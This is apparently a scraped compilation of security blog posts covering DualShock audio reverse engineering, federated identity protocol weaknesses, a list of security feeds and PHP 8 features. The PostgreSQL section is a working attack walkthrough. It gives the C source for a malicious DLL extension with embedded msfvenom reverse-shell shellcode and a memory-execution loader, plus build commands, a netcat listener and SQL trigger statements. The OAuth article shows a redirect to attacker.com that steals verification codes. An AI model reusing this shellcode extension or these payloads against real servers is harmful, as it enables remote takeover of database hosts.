"audio/x-sbc,rate=32000,channels=2,channel-mode=dual,blocks=16,subbands=8,allocation-method=snr,bitpool=25" ! queque ! filesink location=audiofilename.sbc sync=false Using the “snr” method instead of “loudness” the quality of the sound produced by the DualShock 4 seemed better. Below is what changed in terms of SBC headers. // Before 9c 75 19 // After 9c 77 19 The updated script is available on GitHub. Note that this script was tested on Ubuntu 16.04 with kernel 4.4.0 and Raspberry OS with kernel 4.4.50+. If you have issues try to implement the CRC32 or patch your kernel. The result. Thanks for reading. Proudly made by one of those lazy Italians. HAPPY HACKING! <1337 Sursa: https://sensepost.com/blog/2020/dualsense-reverse-engineering/

Common Federated Identity Protocols: OpenID Connect vs OAuth vs SAML 2 BACK TO MAIN BLOG Introduction When it comes to federated identity there are three major protocols used by companies: OAuth 2, OpenID Connect, and SAML. In this article we will examine their security weaknesses and how they relate to each other. Before diving deep into these protocols, let’s first clarify some concepts. Federated Identity Federated identity is a secure way to link the electronic identities of a user across multiple identity management systems. In other words, an application can authenticate a user without needing to collect and store the credentials by using an identity management system that already knows the user’s identity. The main advantage of this approach is that it makes it easier to centralize authentication/authorization in enterprises, so different internal applications don’t need to manage users’ credentials themselves. Also, it is simple and convenient for users since they don’t need a unique username/password combination for every application. Single Sign-On (SSO) Single sign-on is a great way to simplify password management. It allows users to access multiple services/web applications with a single login. This means that once a user is logged into a service she automatically gains access to other services without having to re-submit credentials. For example, think of your Google account. Once you log in you can access Youtube, Google Ads, Google Analytics, or GMail without being asked for your username and password over and over again. Authentication vs. Authorization Authentication and Authorization are two terms and different concepts that people often confuse. On a daily basis we interact with numerous computer devices and online services. Often we are required to confirm our identity to benefit from a personalized service or better security. We cannot simply provide a name, we also need to provide evidence to confirm our identity. This is authentication, the process that confirms a user’s identity based on one or more authentication factors. A factor can be something that user owns (digital signature, ID card, security token), something that user knows (password, PIN, secret answer) or what the user is (fingerprint, voice, retina scan). Authorization has nothing to do with confirming a user’s identity. Its purpose is to determine which resources a user should be able to access and what they should be allowed to do with those resources. For example, once you log into a community board as an administrator, the authorization process makes sure that you can access specific resources and functions (such as admin control panel, edit/delete users’ posts functions), while an unprivileged user won’t be able to use those features. This process is useful in restricting free accounts from accessing premium features and preventing a user from modifying data that isn’t theirs. To recap, authentication is verifying the identity of a user while authorization is deciding which resources a user should be able to access. Now, let’s discuss the similarities and differences between the most used federated identity protocols: OAuth 2.0, OpenID Connect, and SAML 2.0. OAuth 2 OAuth 2 is an authorization framework that allows a user to grant external applications access to their data stored by another application (e.g., public profile, friends list, photos), without having to expose their credentials. To make things easier, let’s consider the following example: You have just signed up on GMail, but you want to import your contact list from your old Yahoo inbox. During this process you will see the pop-up window from Figure 1 asking you to allow a third-party service to access your contacts, profiles, and others; that is OAuth 2. By clicking “Agree” the GMail app becomes authorized to access your Yahoo Mail data, but let’s find out how the protocol (i.e. OAuth 2) works. Figure 1: Third-party app asking for access. Oauth 2 defines four roles: Resource owner: the user that can grant access to the protected resource Client: the application that requests access to a protected resource Resource Server: the server that hosts a protected resource Authorization Server: the server that authorizes the client to access a protected resource In the previous example you are the resource owner and the GMail application which tries to access your Yahoo Mail data is the client. Thus, api.mail.yahoo.com fulfills both the resource and authorization server roles. To be able to delegate the authorization OAuth 2 can use four different process flows known as authorization grant types: Authorization Code Grant Type Implicit Grant Type Resource Owner Password Credentials Grant Type Client Credentials Grant Type In this article we will discuss the first two grant types as the others are rarely used. To gain access to the protected resource OAuth 2 follows a three-step process described in Figure 2. Figure 2: Basic OAuth 2 workflow (Source: Auth0). First, the Client (application) spawns a browser window similar to the one from Figure 1 asking for Resource Owner’s authorization to proceed further. Once the Resource Owner approves the access the Client receives a verification code -a simple randomly generated string. The Client requests an Access Token from Authorization Server by providing the verification code acquired in the previous step. If the verification code is correct the Authorization Server generates an Access Token and sends it to the Client. The Client makes an HTTP request to access the protected resource located on the Resource Server including the Access Token in the request. If the Access Token is valid the Client is allowed to access the protected resource. OAuth 2.0 vulnerabilities With a search on HackerOne’s platform you can see there are many vulnerabilities related to this technology (see Figure 3). So, what is the problem? Is OAuth 2 an insecure protocol? The answer is no. Even though some things could be improved, OAuth 2 is secure. It is important to understand that OAuth 2 was built to eliminate the need for a specific insecure anti-pattern (i.e., exposing username and password to third parties during authorization granting process). So, the problem is not the protocol itself, but rather how developers implement it. All the potential vulnerabilities that may arise due to faulty implementation of the OAuth 2 have been well-documented in RFC 6819, just a few months after the second major version of the protocol was released. Figure 3: Vulnerabilities disclosed on HackerOne affecting OAuth instances We won’t discuss all the implementation vulnerabilities related to OAuth 2 but focus on the most prevalent. So, let’s start with the first one: Account Takeover via Open Redirect. Account Takeover via Open Redirect The account takeover vulnerability that can affect OAuth 2 occurs due to improper sanitization of the redirect_uri parameter, allowing an attacker to hijack a victim’s verification code/access token and take over their account. A typical request URL that asks for a validation code (step 2 from Figure 2) has the following structure: https://login.webapp.com/oauth/authorize?clientid=123456&response_type=code&redirect_uri=https%3A%2F%2Fdashboard.webapp.com%2Fcallback If the web application doesn’t perform strict checks for redirect_uri parameter, an attacker may be able to change the value to his own website. E.g.: https://login.webapp.com/oauth/authorize?clientid=123456&response_type=code&redirect_uri=https%3A%2F%2Fattacker.com%2Foauth If a user of webapp.com tries to log in using the above link his browser will send the verification code to the attacker’s website. The attacker can make a manual request to the original redirect_uri providing the victim’s verification code: https://dashboard.webapp.com/callback?code=victim's verification code The web application will respond with an access token that can be used to access protected resources on behalf of the victim. Mitigation This vulnerability is easy to fix by implementing a allowlist on the redirect_uri parameter. However, make sure your filter matches exact values, otherwise it may be possible to bypass it using some tricks such as https://google.com%FF@dashboard.webapp.com. Account takeover via CSRF Another way to gain access to a victim’s account is by using a CSRF attack. If you are not familiar with this type of attack yet you can check out HackEDU’s hands-on CSRF lesson. The process is straightforward: first, the attacker initiates the OAuth workflow on example.com by choosing to log in with his social media account (e.g., Facebook). However, he will not complete the process and instead stop at step 4 (see Figure 2), just after the authorization code has been generated. The attacker creates a CSRF exploit that makes a request to: https://example.com//auth/facebook/callback?code=<attacker’s authorization code> If the victim is logged in to example.com while visiting attacker’s website, the attacker’s social media account will be linked to the victim’s account. Mitigation CSRF attacks on OAuth endpoints can be prevented by appending the state parameter to the requests. This parameter is optional and acts similar to the traditional CSRF tokens. Conclusion If you are interested in learning more about OAuth 2.0 you can check out these great resources: The OAuth 2.0 Authorization Framework OAuth 2.0 Simplified OAuth 2.0 Threat Model and Security Considerations Next we will discuss the differences and similarities between OAuth 2 and OpenID Connect. OpenID Connect OpenID Connect (OIDC) is an authentication protocol widely supported and used by Google, Paypal, Verizon, Microsoft, Salesforce, Amazon, and many others. If you ever used the “Log in with Paypal” feature when shopping online, that was OIDC - a web-based SSO service that allows a user to login to a website/application by authenticating with an identity provider. Despite its name, OpenID Connect is not based on the first version of the protocol (OpenID), but instead on OAuth 2.0 specifications. More specifically, OpenID Connect extends OAuth 2 capabilities by implementing user authentication through cryptographically secured token, sharing basic profile information about the user, as well as some other important features and additional security improvements. As you can see in Figure 4, the OIDC and OAuth 2 workflows are similar. The main difference is that OIDC uses id_token for an authentication purposes. This parameter which contains information about the authenticated user is sent back to the Client in a JSON Web Token (JWT) format during the last step of the workflow, along with the access_token. JWT is a simple yet efficient way to transfer information between two parties securely. Information in the JWT is digitally-signed, which means every trusted party that can handle a JWT can tell whether or not the token has been changed in any way. If you are not familiar with this technology you can check out HackEDU’s hands-on lesson about JWT tokens and potential issues. Figure 4: OpenID Connect Authentication workflow (Source: Onelogin Developers) Since OpenID Connect is based on OAuth 2.0 some of the potential issues described in RFC 6819 - OAuth 2.0 Threat Model and Security Considerations are applicable here too. Also, OIDC Security Considerations Section specifies additional attack vectors and mitigations that should be considered. OIDC does contains improvements that solve a number of security issues related to OAuth 2.0. OpenID Connect vs. OAuth 2.0 The most important difference between those two protocols is that OpenID is an authentication protocol, while OAuth 2.0 is an authorization protocol. The other differences and similarities are summarized in the following table: OAuth 2.0OpenID ConnectPurposeAuthorizationAuthorization, authentication and API access managementUse-caseUseful to protect APIsNew web or mobile applications, SSO for consumer appsLimitationsDoes not include authenticationFormatJSONJSONSet-up difficultyEasy to implement and useEasy to implement and useScalabilityEasy to scaleEasy to scale SAML 2.0 Security Assertion Markup Language (SAML) is an XML-based open-standard which simplifies the authentication and authorization process between two parties: an Identity Provider and Service Provider. In other words, SAML allows you to use a single pair of credentials to log into multiple web applications. In contrast to OpenID Connect, this protocol is often used in enterprise networks to give users access to specific 3rd party services. SAML works by securely exchanging authentication and authorization data in XML format between the user, Service Provider, and Identity Provider. The Identity Provider is the system which verifies the user’s identity. It performs the authentication process and sends the user’s information as well as the access rights for the service to the Service Provider. A commonly used identity provider is Microsoft Active Directory, Okta, or OneLogin. The Service Provider is the system which receives and accepts information from the Identity Provider (e.g., Salesforce, Office365, Slack). Once a user logs into a SAML instance the Service Provider request authorization to access the user’s data from the Identity Provider. The Identity Provider validates the user’s credentials and tries to authenticate them. If the credentials are valid the Service Provider will receive the authorization and the user will be allowed to use the application. All these transactions are performed through SAML assertions - XML documents that contain the authorization data. There are three types of assertions: authentication, attribute, and authorization assertion. In Figure 5, you can see the SAML’s workflow: Figure 5: SAML workflow (source: https://www.mutuallyhuman.com/blog/choosing-an-sso-strategy-saml-vs-oauth2/) Let’s suppose that Steve wants to log into an internal Salesforce instance. Since the application uses SAML for authentication/authorization it starts by generating a SAML request. The browser redirects Steve to the Identity Provider (OneLogin for example) which also parses the SAML request and asks Steve for his credentials. If the credentials are valid then the Identity Provider creates the authentication response that includes Steve’s identity information (email/username), signs it using an X.509 certificate, and sends it to the Service Provider (Salesforce app). During the last step the Service Provider (Salesforce) verifies the SAML assertions and extracts the relevant information about Steve. Now Steve can browse the application as a logged-in user. SAML Vulnerabilities A successful attack on a SAML instance can be a critical risk. In some cases an attacker can take over a victim’s account or even get unauthorized access to the entire system. There are many potential vulnerabilities that you should check for, but you can speed up the process using different tools such as SAML Raider to quickly detect and test SAML misconfigurations. The vulnerabilities are due to improper implementation and not from the protocol itself. We’ll briefly discuss two of the most common attacks on SAML: XML Signature Wrapping and a more recently discovered Authentication Bypass. XML Signature Wrapping Most of SAML security issues are caused by the incorrect implementation of the XML signature/encryption. XML Signature Wrapping is an attack in which the structure of signed elements is modified so that the application logic evaluates the newly created elements. This allows an attacker to send arbitrary requests as a legitimate user. Figure 6: Encrypted SOAP message protected by an XML Signature Source: How to break XML encryption Figure 7: XML Signature Wrapping attack applied on an encrypted and signed message shown in Figure 6. As you can see in Figure 7, the original Body element has been moved to the Header section, and a newly created Body was introduced. A vulnerable application finds the Body element in the Header section and verifies the XML Signature. If the signature is valid, it decrypts the EncryptedData element where the attacker introduced his malicious content. This attack is possible because the position of the signed elements were not fixed. This means that the signature is valid regardless of the location of the element allowing an attacker to change the structure of the base document. SAML Authentication Bypass On February 27, 2018, Duo Security announced they found an authentication bypass vulnerability affecting several widely-used SAML libraries. The issue allows an authenticated attacker to login to other users’ accounts without knowing their password. Below are the steps required for a successful attack: The attacker logs into his account (john@example.com.evil.com) and tries to access a resource. The Identity Provider generates a SAML assertion containing the user identifier (email address) and sends it back to the Service Provider. Now the attacker updates his email address in the SAML assertion, and adds an XML comment right before .evil.com: john@example.com.evil.com. Due to an XML parsing issue the SAML Processing Library ignores the comment and everything after it. Thus, the Service Provider processes john@example.com as the real email address of the attacker instead of john@example.com.evil.com. As a result, the attacker is allowed to access the protected resource on behalf of john@example.com. Mitigation If you run an Identity Provider or Service Provider the best way to avoid this vulnerability is to make sure that you are not using a vulnerable SAML processing library (you can find a list of affected libraries here). Additionally, you can enable two-factor authentication to prevent an attacker from accessing the victim’s account. SAML vs. OpenID Connect vs. OAuth 2 SAML and OpenID Connect support both authentication and authorization while OAuth 2 was created to delegate the authorization process. SAML is definitely the hardest to implement but offers great flexibility. Since SAML only handles the information exchange between the Identity Provider and the Service Provider it allows the developer to choose how the users authenticate. The following table summarizes some of the differences and similarities between these three protocols. OAuth 2.0 OpenID Connect SAML Purpose Authorization Authorization, authentication and API access management Authorization, authentication Use-case Useful to protect APIs New web or mobile applications, SSO for consumer apps Existing federations, enterprise SSO Limitations Does not include authentication Not designed for designed for mobile or native applications. Format JSON JSON XML Set-up difficulty Easy to implement and use Easy to implement and use Hard to implement Scalability Easy to scale Easy to scale Depends on implementation Can invalidate an access tokens? Yes Yes No Transport HTTP HTTP (GET & POST) HTTP Redirect binding, HTTP POST binding, SAML SOAP binding, HTTP Artifact binding, SAML URI binding Sursa: https://www.hackedu.com/blog/analysis-of-common-federated-identity-protocols-openid-connect-vs-oauth-2.0-vs-saml-2.0

POSTGRESQL EXTENSION SHELLCODE EXECUTION Root InfoSec Windows Postgresql Extension Shellcode Execution Postgresql allows us to create our own user defined functions (UDF) from existing or custom extensions (as DLL files on Microsoft Windows). This is particularly useful when it comes to gain access to a target system when we control SQL execution flow and have sufficient privilege to create and user Postgres UDF. REQUIREMENTS LOCAL POSTGRESQL SERVER To maximise the chance to succeed executing our own Postgres extension, it is very important to extract the version of target Postgres server and install the exact same version in your own lab environment. In our case, we are targeting a PostgreSQL 13.1 64-bit It is also important to note the target Postgres architecture (in our case x86-64). Depending on target architecture we will need to compile our custom extension wether in 32 or 64bit. Executing a 32bit extension in a 64bit instance of Postgres will simply fail. It is naturally the same with a 64bit extension in a 32bit instance of Postgres. Installing Postgresql will also automatically extract required C header files to build our own extension. This is why it is so important to compile our custom extension in an environment with the exact same version of Postgresql server available since those files might change between two version. Those C header files are generally located at this path : C:\Program Files\PostgreSQL\<pg_version>\include Where pg_version is the version of Postgresql we want to target (in our case, version 13.x). C COMPILER To compile our custom extension, we will need to have a C compiler installed and supporting the correct architecture. We will use MinGw C 64bit compiler that comes as an extra package of Cygwin. Feel free to use and adapt the build process with your favorite C compiler / IDE. CREATE A VERY BASIC EXTENSION. minimal_extension.c #include "postgres.h" // Required postgres C header file #include "fmgr.h" // Required postgres C header file #ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; // Used by postgresql to recognize a valid extension #endif /* Define which functions can be used by postgres. In our case just "custom_func" */ PGDLLEXPORT Datum custom_func(PG_FUNCTION_ARGS); PG_FUNCTION_INFO_V1(custom_func); /* Our custom function code goes there */ Datum custom_func(PG_FUNCTION_ARGS) { OutputDebugStringW(L"Hello from postgresql extension."); PG_RETURN_VOID(); } Above code is the minimal required code to build our own Postgresql extension. On Microsoft Windows, Postgresql extension are compiled as DLL files. We can compile our extension code using the following command: x86_64-w64-mingw32-gcc.exe minimal_extension.c -c -o minimal_extension.o -I "C:\Program Files\PostgreSQL\13\include" -I "C:\Program Files\PostgreSQL\13\include\server" -I "C:\Program Files\PostgreSQL\13\include\server\port\win32" C:\Program Files\PostgreSQL\13\include C:\Program Files\PostgreSQL\13\include\server C:\Program Files\PostgreSQL\13\include\server\port\win32 Are required postgresql header files locations. We then can build our DLL file using the following command: x86_64-w64-mingw32-gcc.exe -o minimal_extension.dll -s -shared minimal_extension.o -Wl,--subsystem,windows LOAD EXTENSION We will use the PgAdmin tool to run our custom SQL queries to load and test our custom extension. CREATE OR REPLACE FUNCTION custom_func() RETURNS void AS '<extension_path>', 'custom_func' LANGUAGE C STRICT; Where extension_path is the location of our DLL file. A little popup should say that query were successfully executed. CALL EXTENSION FUNCTION First let’s open a privileged DebugView.exe instance to catch our OutputDebugString. Be sure to have Capture > Capture Global Win32 option checked. We can now call our newly registered function from our custom extension using a basic SELECT statement. SELECT custom_func(); We should now see our message in DebugView window. Success! We are now free to replace our basic OutputDebugString with more complex code and take advantage of Postgres extension to gain privileged access on a target machine. UNREGISTER FUNCTION During development process, we will often need to patch our custom extension. Our DLL file is currently loaded by postgres process so the file is locked and can’t be patched as is. We can simply first unregister our custom function declaration using the following SQL statement DROP FUNCTION IF EXISTS custom_func; Then open our Microsoft Service manager and restart postgres service. This will unlock our DLL file. SHELLCODE EXECUTION We now know how to create and execute code from custom extension through postgres extension capabilities. We will now create a new version of our extension to execute shellcode payloads. We will use Metasploit Msfvenom to create our payload. And use a classic technique to copy our payload to a new allocated memory region and create a new thread starting code execution at this new location. This will prevent our current postgres thread to hang when executing payload. —warning— Don’t forget to replace current defined payload with your own version. —end— PgShellcodeExt.c #include "postgres.h" #include "fmgr.h" #ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; #endif // msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=172.16.20.6 LPORT=443 -f c -v payload unsigned char payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33" "\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00" "\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xac\x10\x14\x06\x41\x54" "\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c" "\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff" "\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2" "\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48" "\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99" "\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63" "\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57" "\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44" "\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6" "\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff" "\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5" "\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff" "\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48" "\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13" "\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"; PGDLLEXPORT Datum shellcode(PG_FUNCTION_ARGS); PG_FUNCTION_INFO_V1(shellcode); Datum shellcode(PG_FUNCTION_ARGS) { /* Classic method to load a shellcode in memory and create/execute a new thread at it location. */ LPVOID p = VirtualAlloc(NULL, sizeof(payload), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE); DWORD dwThreadId; MoveMemory(p, &payload, sizeof(payload)); CreateThread(NULL, 0, p, NULL, 0, &dwThreadId); PG_RETURN_VOID(); } x86_64-w64-mingw32-gcc.exe PgShellcodeExt.c -c -o PgShellcodeExt.o -I "C:\Program Files\PostgreSQL\13\include" -I "C:\Program Files\PostgreSQL\13\include\server" -I "C:\Program Files\PostgreSQL\13\include\server\port\win32" x86_64-w64-mingw32-gcc.exe -o PgShellcodeExt.dll -s -shared PgShellcodeExt.o -Wl,--subsystem,windows We can now open a new local netcat listener on our attacker’s machine. user@local:$ nc -lvp 443 And then register and trigger our custom extension with following SQL statement (still from our PgAdmin instance) -- Register new function CREATE OR REPLACE FUNCTION shellcode() RETURNS void AS 'C:\Users\Jean-Pierre LESUEUR\Desktop\PgShellcodeExt\PgShellcodeExt.dll', 'shellcode' LANGUAGE C STRICT; -- Trigger function SELECT shellcode(); -- Delete function DROP FUNCTION IF EXISTS shellcode; Checking our local netcat listener reveal we’ve successfully received our reverse shell. CONCLUSION This paper demonstrated how to take advantage of postgres extension capabilities to execute shellcode. But it will need more efforts in production to be usable. First you will need to find a way to execute SQL queries as a privileged postgres user (required to implement new extensions). Most of the time from a SQL injection present in a vulnerable application. Secondly, you will need to find a way to transmit your DLL extension to target machine: Additional SQL Statements File Uploads Shares etc… Feel free to port this example to another operating system (ex: Linux). Most of the thing are very similar. We will probably post another paper on this subject for Linux. WRITTEN THE NOV. 27, 2020, 11:14 A.M. BY JEAN-PIERRE LESUEUR UPDATED: 2 DAYS, 3 HOURS AGO. Sursa: https://www.phrozen.io/resources/paper/41df297b-cfe3-43ec-88e8-0686e5548dd5

Awesome Security Feeds A semi-curated list of Security Feeds You can import the opml file to a service like Feedly Below a list of all the sites, feel free to suggest others! Must Read TorrentFreak Schneier on Security Darknet Troy Hunt's Blog Securelist Dan Kaminsky's Blog ZDNet | The Ed Bott Report RSS Daniel Miessler Infosec Reactions Malwarebytes Labs Security Research & Defense Have I Been Pwned latest breaches Malware Must Die! enigma0x3 SkullSecurity News – – WordPress.org Conferences & Video Paul's Security Weekly Defcon SecurityTube.Net media.ccc.de - NEWS Vimeo / Offensive Security’s videos Irongeek's Security Site Italiano dirittodellinformatica.it - Rivista telematica su diritto e tecnologia oneOpenSource Securityinfo.it D3Lab Trin Tragula 0x2A ICT Security Magazine Andrea Draghetti VoidSec Luca Mercatanti WebSecurity IT Over Security Zeus News - Olimpo Informatico Autistici Dark Space Blogspot Yoroi Warning Archive Feed Baty's Base F-Hack » Feed Arturo Di Corinto Il Disinformatico Cyber Division CyberDifesa.it cavallette TG Soft Software House - News Codice Insicuro, blog di Cyber Security, sviluppo sicuro, code review e altro. Cyber Security IT Service Management News TS-WAY Stories by theMiddle on Medium Fabio Natalucci Post LastKnight.com Feed PANOPTICON ESCAPE CyberIntelligence CyberCrime & Doing Time Cyber Strategies for a World at War Automating OSINT Blog bellingcat IntelTechniques Red Teaming - Red Teams Uncommon Sense Security JestersCourt Silendo Krypt3ia Security Intelligence and Big Data reddit Information Security Training Resources /r/netsec - Information Security News & Discussion Deep Web Reverse Engineering Blackhat Library Computer Forensics Your Hacking Tutorial by Zempirians RedTeam Security Social Engineering Information Security netsecstudents: Subreddit for students studying Network Security and its related subjects Blog Cybrary Joe's Security Blog Kevin Chung Randy Westergren evilsocket Webroot Blog shell-storm BugCrowd ZeroSec - Adventures In Information Security DigiNinja SkullSecurity l.avala.mp's place HighOn.Coffee Max Justicz Null Byte Krebs on Security BREAKDEV EFF ProtonMail Blog SANS Internet Storm Center, InfoCON: green NetSPI Blog 0x00sec - The Home of the Hacker - Monthly top topics Open Web Application Security Project Bromium 🔐Blog of Osanda Coding Horror Application Security Research, News, and Education Blog xorl %eax, %eax TaoSecurity Blog Updates from the Tor Project thinkst Thoughts... David Longenecker JestersCourt Technical phillips321.co.uk Add / Xor / Rol Intercept the planet! @Mediaservice.net Technical Blog AlienVault Labs Blog MalwareDomainList updates winscripting.blog PenTest Labs Brett Buerhaus Jack Hacks 0x27.me The Exploit Laboratory Linux Audit CERT Blogs Forcepoint markitzeroday.com Down the Security Rabbithole Blog - Supplemental Research Blogs Feed NotSoSecure CYBER ARMS Blog – LookingGlass Cyber Solutions Inc. Cofense anti-virus rants Hackw0rm.net Attack and Defense Labs AverageSecurityGuy Shodan Blog BalalaikaCr3w TrustedSec CyberWatch JUMPSEC | CREST Accredited Dave Waterson on Security Shell is Only the Beginning MDSec dotcppfile's Blog #_shellntel binary foray Blog HolisticInfoSec™ Secureworks Blog NETRESEC Network Security Blog The Honeynet Project blogs Pending Technical Errata Security Cylance Blog Red Hat Security Inspired-Sec Furoner.CAT 0xAA - Random notes on security Fzuckerman© HIPAA News, Web & Email Security Tips & News - Plus More | LuxSci Bromium Labs The Ethical Hacker Network Hacking and security The Grymoire Active questions tagged linux - Information Security Stack Exchange /dev/random 0x3a - Security Specialist and programmer by trade Security Research & Defense US-CERT Alerts Strategic Cyber LLC Rapid7 Blog VulnHub ~ Entries Shell is coming ... Lastline Blog Maltego MalwareTech Hacking Articles Microsoft Security Infosec Resources WhiteScope IO Security – Cisco Blogs Unmask Parasites. Blog. TheGeryCorner Imperva Cyber Security Blog Hanno's blog Checkmarx Active Directory Security StopBadware blogs Azeria Labs Pentestmag KernelPicnic Blog - Decent Security SpiderLabs Blog from Trustwave Mogozobo Stealing the Network 4sysops Rhino Security Labs Astr0baby's not so random thoughts _____ rand() % 100; Hakin9 – IT Security Magazine Blog TrendLabs Security Intelligence Blog Appsecco Penetration Testing contagio Security Through Education Blog – WhiteHat Security DEADCODE Javvad Malik Shell is Only the Beginning NetSPI Blog Eric Conrad Andrew Hay Milo2012's Security Blog #!/slash/note Securosis Complete Jump ESP, jump! SerHack – Security research on SerHack – Security researcher Carnal0wnage & Attack Research Blog www.crowdstrike.com/blog harmj0y US-CERT Current Activity Seculert Blog on Breach Detection damsky Black Hills Information Security Mosaic Security Research Sucuri Blog Security Art Work XyliBox Carnal0wnage & Attack Research Blog The Sakurity Blog thepcn3rd - Passion for Infosec | bohops | Real-time communications security on Communication Breakdown - real-time communications security blackMORE Ops Security and risk Qualys Security Blog Securelist Malware Analysis: The Final Frontier myexploit Martin Vigo Common Exploits – Penetration Testing Information RedTeams Corelan Team Cybersecurity Blog PC's Xcetra Support Nat McHugh AppSec-Labs | Application Security gynvael.coldwind//vx.log (en) Blaze's Security Blog Bill Demirkapi’s Blog Infosec Island Latest Articles SANS Institute Security Awareness Tip of the Day Threat Research Cybercrime Magazine Forensic Focus TaoSecurity Security Training Security Zap Wiremask's Feed ExposedBotnets Shell is Only the Beginning SecurityCurrent Posts By SpecterOps Team Members Cheesy Rumbles @D00m3dr4v3n enigma0x3 Posts on malicious.link Hacking Exposed Computer Forensics Blog Volatility Labs Team-Cymru Security Spread Security Basics Cisco Blog » Security Silent Signal Techblog Security on the edge Délimiteur de données sirdarckcat Aditya Agrawal TheHackerBlog Labs PortCullis Fox-IT International blog Lab of a Penetration Tester F-Secure Antivirus Research Weblog HackTips The Life of a Penetration Tester Virus Bulletin's blog Tenable Blog Didier Stevens Oddvar Moe's Blog Google Online Security Blog Sucuri Blog Darknet Yubico Sam Curry F-Secure Antivirus Research Weblog Thoughts on Security Tyranid's Lair Orange Cyberdefense Inspired-Sec Stories by Scott J Roberts on Medium Aditya Agrawal Fortinet Blog Tech Vomit LockBoxx Mozilla Security Blog Blog – NotSoSecure MSitPros Blog CERIAS Combined Feed The World of IT & Cyber Security: ehacking.net BlueKaizen Security Sift KahuSecurity Trend Micro Subliminal Hacking NVISO Labs HACKMAGEDDON Lenny Zeltser Security Christopher Truncer's Website A Few Thoughts on Cryptographic Engineering Project Zero w00tsec I CAN'T HACK IT …OR CAN I? ImperialViolet sploitF-U-N Netwrix Blog | Insights for Cybersecurity and IT Pros RefinePro Knowledge Base for OpenRefine khr@sh#: echo $GREETING Web Security Nibble Security Security Breached Blog Agarri : Sécurité informatique offensive Minded Security Blog Bug Bounty POC Telekom Security Random stuff by yappare Brett Buerhaus FoxGlove Security Noob Ninja! OpnSec WHITE HAT - WRITE UPS - RSS Security Thoughts Nikhil Mittal's Blog mert's blog the world. according to koto Patrik Fehrenbach PortSwigger Blog Hacking Distro BackBox Linux blogs Kali Linux WeakNet Labs DistroWatch.com: News Tails - News Security Tools ToolsWatch.org Network Security™ KitPloit - PenTest Tools! Security News Graham Cluley The Hacker News ThreatPost Security Affairs Trend Micro Simply Security The Register - Security Palo Alto Networks Blog Instapaper: Unread SANS Digital Forensics and Incident Response Blog Dark Reading Sursa: https://github.com/mrtouch93/awesome-security-feed

PHP 8 is now Released! NOVEMBER 27, 2020 / ERIC L. BARNES The PHP development team announced the release of PHP 8 yesterday: PHP 8.0 is a major update of the PHP language. It contains many new features and optimizations including named arguments, union types, attributes, constructor property promotion, match expression, nullsafe operator, JIT, and improvements in the type system, error handling, and consistency. Here is the list of main new features: Union Types Named Arguments Match Expressions Attributes Constructor Property Promotion Nullsafe Operator Weak Maps Just In Time Compilation And much much more… Here are some of the highlights from the announcement: PHP 8 Named arguments // PHP 7 htmlspecialchars($string, ENT_COMPAT | ENT_HTML401, 'UTF-8', false); // PHP 8 // Specify only required parameters, skipping optional ones. // Arguments are order-independent and self-documented. htmlspecialchars($string, double_encode: false); PHP 8 Attributes Instead of PHPDoc annotations, you can now use structured metadata with PHP’s native syntax. // PHP 7 class PostsController { /** * @Route("/api/posts/{id}", methods={"GET"}) */ public function get($id) { /* ... */ } } // PHP 8 class PostsController { #[Route("/api/posts/{id}", methods: ["GET"])] public function get($id) { /* ... */ } } PHP 8 Constructor property promotion Less boilerplate code to define and initialize properties. // PHP 7 class Point { public float $x; public float $y; public float $z; public function __construct( float $x = 0.0, float $y = 0.0, float $z = 0.0, 